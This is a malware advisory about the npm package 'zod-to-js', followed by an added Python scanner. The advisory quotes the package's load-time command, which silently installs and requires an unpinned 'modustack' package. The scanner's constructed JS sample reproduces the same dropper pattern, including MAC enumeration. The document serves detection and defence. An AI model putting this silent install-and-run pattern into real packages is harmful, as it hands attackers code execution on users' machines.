MAL-2026-4740
Malicious code in zod-to-js (npm)
Details
## Source: amazon-inspector (370d1632254cb5b5dbd394992054b6c0e943a6fb758ab70f470c059ee734b9c0)

The package is published as 'zod-to-js' but ships a copy of pino's source tree (main entry `pino.js`, lib/proto.js, lib/levels.js, pino docs/README) with a description copy-pasted from inquirer and homepage `https://getpino.io` — a deceptive identity unrelated to its declared name. On `require('zod-to-js')`, the load chain reaches `lib/writer.js`, which attempts `require('modustack')` and, on failure, executes `execSync('npm install modustack --no-warnings --no-save --no-progress --loglevel silent', { windowsHide: true })` followed by `require('../../modustack/pino.js')`. The install is unpinned, has no integrity check, and runs whatever bytes the attacker currently publishes under the `modustack` name. The same file contains additional staging scaffolding — a `String.fromCharCode`-based string builder and a `getMacAddress()` helper that enumerates non-internal interface MACs but is unreferenced in the visible code path — consistent with a loader/dropper shaped for evasion. Any consumer that imports this package triggers attacker-controlled code execution on the installer's machine.
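The behaviour above (a module that shells out to `npm install` for an unpinned name at require time, then requires code from the freshly installed tree, alongside dormant MAC-enumeration scaffolding) can be turned into a static check over a vendored `node_modules` tree. The scanner below is an added example, not part of the advisory or of the amazon-inspector analysis; its regexes are heuristics assumed from the description, and the `lib/writer.js` sample it scans is a constructed stand-in (dependency name `somedep`, no real payload), not the package's actual file.

```python
"""Scan an unpacked npm package tree for the load-time dropper shape described in
MAL-2026-4740.  Added example; heuristics and sample content are constructed
assumptions, not the malicious package's own code."""
import os
import re
import tempfile

# Traits assembled from the behaviour the advisory describes.
INSTALL_AT_LOAD = re.compile(r"""exec(?:Sync)?\s*\(\s*['"`]\s*npm\s+(?:i|install)\b""")
SILENT_FLAGS = re.compile(r"--no-save|--loglevel\s+silent|--no-progress|--no-warnings")
ESCAPING_REQUIRE = re.compile(r"""require\s*\(\s*['"`](?:\.\./){2,}""")  # require() that climbs out of the package
MAC_ENUM = re.compile(r"networkInterfaces\s*\(")


def scan_source(text):
    """Return the names of suspicious traits found in one JS source string, in scan order."""
    traits = []
    if INSTALL_AT_LOAD.search(text):
        traits.append("npm-install-at-load")
        if SILENT_FLAGS.search(text):
            traits.append("silent-install-flags")
    if ESCAPING_REQUIRE.search(text):
        traits.append("require-outside-package")
    if MAC_ENUM.search(text):
        traits.append("mac-address-enumeration")
    return traits


def scan_tree(root):
    """Walk a package directory; map each .js file that has findings to its traits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                traits = scan_source(fh.read())
            if traits:
                findings[os.path.relpath(path, root)] = traits
    return findings


def is_loader_dropper(traits):
    """Flag when install-at-load is combined with requiring the just-installed tree."""
    return "npm-install-at-load" in traits and "require-outside-package" in traits


# Constructed sample that mirrors the shape in the advisory (hypothetical dep name, no payload).
SAMPLE_WRITER_JS = r"""
const { execSync } = require('child_process');
const os = require('os');
let mod;
try {
  mod = require('somedep');
} catch (e) {
  execSync('npm install somedep --no-warnings --no-save --no-progress --loglevel silent',
           { windowsHide: true });
  mod = require('../../somedep/index.js');
}
function getMacAddress() {
  return Object.values(os.networkInterfaces()).flat().filter(i => !i.internal).map(i => i.mac);
}
module.exports = mod;
"""
BENIGN_JS = "module.exports = function (x) { return x * 2; };\n"


def demo():
    """Write the constructed samples into a temporary package tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "lib"))
        with open(os.path.join(root, "lib", "writer.js"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_WRITER_JS)
        with open(os.path.join(root, "index.js"), "w", encoding="utf-8") as fh:
            fh.write(BENIGN_JS)
        return scan_tree(root)


if __name__ == "__main__":
    for path, traits in demo().items():
        verdict = "LOADER/DROPPER" if is_loader_dropper(traits) else "review"
        print(f"{path}: {verdict} {traits}")
```

Run `scan_tree("node_modules/<package>")` against a real install to get the same per-file trait list; only the combination of `npm-install-at-load` with `require-outside-package` is treated as a dropper verdict, because either trait alone (a postinstall helper, a monorepo relative require) has benign uses. The regexes are deliberately loose, so treat hits as triage input rather than proof, and pair the check with `--ignore-scripts` and lockfile-pinned installs in CI.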
Affected packages
No fixed version published yet for zod-to-js (npm). Pin to a known-safe version or switch to an alternative.